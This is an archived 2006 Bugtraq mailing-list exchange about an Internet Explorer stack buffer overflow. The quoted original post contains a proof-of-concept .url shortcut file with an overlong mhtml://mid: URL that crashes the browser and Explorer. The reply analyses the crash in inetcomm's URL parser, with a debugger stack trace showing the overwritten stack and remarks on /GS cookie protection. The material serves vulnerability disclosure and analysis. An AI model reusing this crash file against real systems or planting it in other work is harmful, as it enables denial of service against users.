lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <00ea01c68549$272c4f80$7102a8c0@pune.nevisnetworks.com>
Date: Thu, 1 Jun 2006 12:31:02 +0530
From: "Hariharan" <harij22@...il.com>
To: <Mr.Niega@...il.com>, <bugtraq@...urityfocus.com>
Subject: Re: Internet explorer Vulnerbility


I see this work in explorer and my ie 7 beta, both of them crashes.  But 
this does not seem to be easily exploitable. It is a simple stack buffer 
overun issue. The problem seems to be in 
inetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seemed to have been 
gs flagged complied,hence the ovewrite of the security cookie casuses the 
internal handler inetcomm!__report_gsfailure to be called on fucntion 
return. This could be exploitable if we some evasive techniques is used. But 
on the face of it does not seem like a easy nut to crack.

All applications which use inetcomm are vulnerable if they are using url 
parsing, specially mhtml:cid or mid, havent tried others yet, maybe 
possible.


Thanks
-Hariharan

PS: This is what the stack looks like, notice the 'a' in it, seems 
internally the fucntion converts the url case.


00df9318 7c802542 00000758 000493e0 00000000 ntdll!KiFastSystemCallRet

00df932c 6945ada6 00000758 000493e0 003a0043 
kernel32!WaitForSingleObject+0x12

00df9e10 6945aff1 00000734 00000b90 00000748 
faultrep!InternalGenerateMinidumpEx+0x335

00df9e3c 6945b50a 00000734 00000b90 00dfa7e0 
faultrep!InternalGenerateMinidump+0x75

00dfa718 69456652 00000734 00000b90 00dfa7e0 
faultrep!InternalGenFullAndTriageMinidumps+0x8a

00dfbfd8 69457d3d 00dfc040 0154f660 00000000 faultrep!ReportFaultDWM+0x4e5

00dfc4c0 694582d8 00dfdad8 00dfd308 00000001 
faultrep!StartManifestReportImmediate+0x268

00dfd52c 7c863059 00dfdad8 00000001 00dfd800 faultrep!ReportFault+0x55a

00dfd7a0 761e234e 00dfdad8 00000000 c0000409 
kernel32!UnhandledExceptionFilter+0x4cf

00dfdae0 761769f2 00000000 00000000 00000000 
inetcomm!__report_gsfailure+0xe3

00dfe444 61616161 61616161 61616161 61616161 
inetcomm!CActiveUrlRequest::ParseUrl+0x67e

00dfe468 61616161 61616161 61616161 61616161 0x61616161

00dfe46c 61616161 61616161 61616161 61616161 0x61616161

00dfe470 61616161 61616161 61616161 61616161 0x61616161

00dfe474 61616161 61616161 61616161 61616161 0x61616161

00dfe478 61616161 61616161 61616161 61616161 0x61616161

00dfe47c 61616161 61616161 61616161 61616161 0x61616161

00dfe480 61616161 61616161 61616161 61616161 0x61616161

00dfe484 61616161 61616161 61616161 61616161 0x61616161

00dfe488 61616161 61616161 61616161 61616161 0x61616161





----- Original Message ----- 
From: <Mr.Niega@...il.com>
To: <bugtraq@...urityfocus.com>
Sent: Thursday, June 01, 2006 1:42 AM
Subject: Internet explorer Vulnerbility


> ------------------------------Niega.url-------------------------------
>
> [DEFAULT]
>
> BASEURL=
>
> [InternetShortcut]
>
> URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
> /*
>
> *
>
> * Internet Explorer overflow Vulnerbility [Proof of concept]
>
> * Bug discovered by Mr.Niega
>
> * http://www.swerat.com/
>
> *
>
> * Affected Software: Microsoft Internet Explorer 6.x
>
> * Severity: Unknown
>
> * Impact: Crash
>
> * Solution Status: Unpatched
>
> *
>
> * E-Mail: Mr.Niega@...il.com
>
> * Credits goes out to MarjinZ and Andvare
>
> *
>
> * Note: By right clicking on the file explorer will crash
>
> * Note: del=crash,F2=crash Use cmd to delete file
>
> */
>
>
> ------------------------------Niega.url------------------------------- 



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ